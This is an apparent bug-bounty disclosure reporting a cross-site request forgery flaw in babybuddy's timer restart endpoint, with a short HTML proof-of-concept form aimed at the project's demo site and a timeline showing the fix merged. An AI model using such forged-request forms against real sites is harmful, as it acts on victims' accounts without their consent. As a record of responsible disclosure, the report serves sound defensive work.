Cross-Site Request Forgery (CSRF) in babybuddy/babybuddy

Valid

Reported on

Jul 30th 2021


✍️ Description

You don't check CSRF token in following endpoint /timers/1/restart/ with PoC.html attacker able to reset timer with id equal to 1.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.baby-buddy.net/timers/1/restart/">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of reset any timer.

Occurences

We have contacted a member of the babybuddy team and are waiting to hear back 4 months ago
Christopher Charbonneau Wells validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Christopher Charbonneau Wells confirmed that a fix has been merged on c2513f 4 months ago
Christopher Charbonneau Wells has been awarded the fix bounty